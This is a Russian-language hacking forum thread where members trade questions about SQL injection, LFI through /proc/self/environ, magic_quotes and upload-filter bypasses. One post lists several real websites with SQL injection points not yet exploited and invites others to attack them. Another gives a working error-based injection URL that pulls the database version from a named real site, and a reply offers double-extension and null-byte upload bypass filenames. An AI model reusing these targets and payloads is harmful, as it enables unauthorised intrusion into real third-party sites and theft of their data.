Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) darky, 4.08.2007.

Статус темы:
Тема закрыта для ответов.
  1. Bb0y

    Bb0y Active Member

    Регистрация:
    30.10.2009
    Сообщения:
    116
    Одобрения:
    136
    Репутация:
    78
    2Strilo4ka дай посмотреть плз
     
    Это одобряет 1 пользователь.
  2. Strilo4ka

    Strilo4ka

    Регистрация:
    5.04.2009
    Сообщения:
    709
    Одобрения:
    729
    Репутация:
    948
    :) двиг 102 атрибута, и второй параметр в лимите.
    не скажу.

    up

    вот:
    Showing rows 0 - 0 (1 total, Query took 0.0009 sec)
    #1221 - Incorrect usage of UNION and ORDER BY

    Понятно что скобки, то не поставить... Идеи?
     
    #12842 Strilo4ka, 11.05.2010
    В последний раз редактировалось: 11.05.2010
  3. BrainDeaD

    BrainDeaD Elder - Старейшина

    Регистрация:
    9.06.2005
    Сообщения:
    774
    Одобрения:
    292
    Репутация:
    214
    странно, 1 и 3 ничего не выводит, или я что-то недопонял.
     
  4. DIEZalok

    DIEZalok Banned

    Регистрация:
    22.01.2009
    Сообщения:
    14
    Одобрения:
    11
    Репутация:
    12
    Часто встречал при LFI при инклюде /proc/self/status встречается 'php5-cgi', в таком случае, при доступе к /proc/self/environ не интерпритируется PHP-код (проверял много раз).

    Объясните, почему?
     
  5. Bb0y

    Bb0y Active Member

    Регистрация:
    30.10.2009
    Сообщения:
    116
    Одобрения:
    136
    Репутация:
    78
    2BrainDeaD, прочти сначала о blind sql injection https://forum.antichat.ru/thread35207-blind+sql+injection.html
    https://forum.antichat.ru/thread18552-blind+sql+injection.html
     
    #12845 Bb0y, 11.05.2010
    В последний раз редактировалось: 11.05.2010
  6. BrainDeaD

    BrainDeaD Elder - Старейшина

    Регистрация:
    9.06.2005
    Сообщения:
    774
    Одобрения:
    292
    Репутация:
    214
    спасибо. у меня ещё много недочётов в знаниях. будем исправляться.
     
  7. Анжелика

    Анжелика Elder - Старейшина

    Регистрация:
    25.03.2008
    Сообщения:
    25
    Одобрения:
    36
    Репутация:
    -4
    Фильтрация - удаление взвешенного вещества из массы воды путем прохождения через слой пористого материала или через сетки с подходящим размером отверстий.

    Грубо говоря, если мы имеем ввиду компьютерную тематику в общем, и хек тематику в частности, фильтрация - удаление символов. Меджик квотс ничего не удаляет, она экранирует
     
    Это одобряет 1 пользователь.
  8. Анжелика

    Анжелика Elder - Старейшина

    Регистрация:
    25.03.2008
    Сообщения:
    25
    Одобрения:
    36
    Репутация:
    -4
    значит это не LFI, а fopen или file_get_contents
     
    Это одобряет 1 пользователь.
  9. DIEZalok

    DIEZalok Banned

    Регистрация:
    22.01.2009
    Сообщения:
    14
    Одобрения:
    11
    Репутация:
    12
    Я умею отличать LFI от остального. Я же написал!
    Каждый раз, когда преписка cgi, php код не интерпритируется!
     
  10. LokbatanLi

    LokbatanLi Member

    Регистрация:
    24.08.2009
    Сообщения:
    170
    Одобрения:
    20
    Репутация:
    -10
    up..pomoqite pojalsuta
     
  11. pinch

    pinch Elder - Старейшина

    Регистрация:
    13.12.2009
    Сообщения:
    417
    Одобрения:
    46
    Репутация:
    40
    список не раскрученных инъекций =:)

    http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'
    http://www.scottishfuturestrust.org.uk/news.asp?id=1'
    http://www.ncm.org.uk/news.asp?id=1'

    может кто раскрутит =))...
     
  12. Анжелика

    Анжелика Elder - Старейшина

    Регистрация:
    25.03.2008
    Сообщения:
    25
    Одобрения:
    36
    Репутация:
    -4
    показать пример где интерпритируется? Эта приписка всего лишь определяет что php работает как CGI, а не как модуль апача
    Мозгом надо работать. Фильтрация - это отсеивание определенных символом, например если бы в защите использовалась функция preg(ereg)_replace и тп - это была бы фильтрация, а magic_quotes - это экранирование. Не путай термины - эту ветку читают новички, они потом и будут ходить и говорить что MQ-это фильтрация
    А в этом плане я действительно больше понимаю чем ты, уж извини
     
    Это одобряют 2 пользоветелей.
  13. LokbatanLi

    LokbatanLi Member

    Регистрация:
    24.08.2009
    Сообщения:
    170
    Одобрения:
    20
    Репутация:
    -10
    откуда magic ON ?

    а здесь к чему филтрасия ?
    и вообше что здeлать тут ?
     
  14. попугай

    попугай Elder - Старейшина

    Регистрация:
    15.01.2008
    Сообщения:
    1 520
    Одобрения:
    401
    Репутация:
    196
    v1d0qz, ты просто не понимаешь семантику слова "фильтрация".
    Когда говорят "фильтрация" в голове возникает образ чего-то, проходящего отбор или отсев. При фильтрации материи или сущности, этой сущности становится меньше, из нее забирают что-либо.

    Magic Quotes добавляет, а не отнимает.
     
  15. Ctacok

    Ctacok Banned

    Регистрация:
    19.12.2008
    Сообщения:
    732
    Одобрения:
    646
    Репутация:
    251
    Magic_quotes - экранирование (c) capitan!
    А фильтрация бывает разная, чёрная, белая, красная...
     
  16. AHMED HASSAN

    AHMED HASSAN New Member

    Регистрация:
    25.04.2007
    Сообщения:
    16
    Одобрения:
    1
    Репутация:
    0
    first sorry for my English

    i don't speak Russian fluently

    i was asking about

    1- how to bypass php filter on uploading image is there is

    any way to bypass i know the ways of live http header and tamper data and so on

    what if site changes name from upload.php to 111.gif ????

    is there is any way to bypass
     
  17. GroM88

    GroM88 Elder - Старейшина

    Регистрация:
    24.10.2007
    Сообщения:
    464
    Одобрения:
    62
    Репутация:
    26
    _http://sng.by/articles/1.html
    можно тут че заимутить? = \
     
  18. warlok

    warlok Elder - Старейшина

    Регистрация:
    17.02.2008
    Сообщения:
    328
    Одобрения:
    142
    Репутация:
    81
    http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+.html
     
    Это одобряет 1 пользователь.
  19. Ctacok

    Ctacok Banned

    Регистрация:
    19.12.2008
    Сообщения:
    732
    Одобрения:
    646
    Репутация:
    251
    1111.gif.php
    1111.gif%00.php - Know triggered or not
     
    Это одобряет 1 пользователь.
  20. GroM88

    GroM88 Elder - Старейшина

    Регистрация:
    24.10.2007
    Сообщения:
    464
    Одобрения:
    62
    Репутация:
    26
    Помогите кто довести до ума плз)
    а то я в таких скул не шарю = \ \ \ \
     
Статус темы:
Тема закрыта для ответов.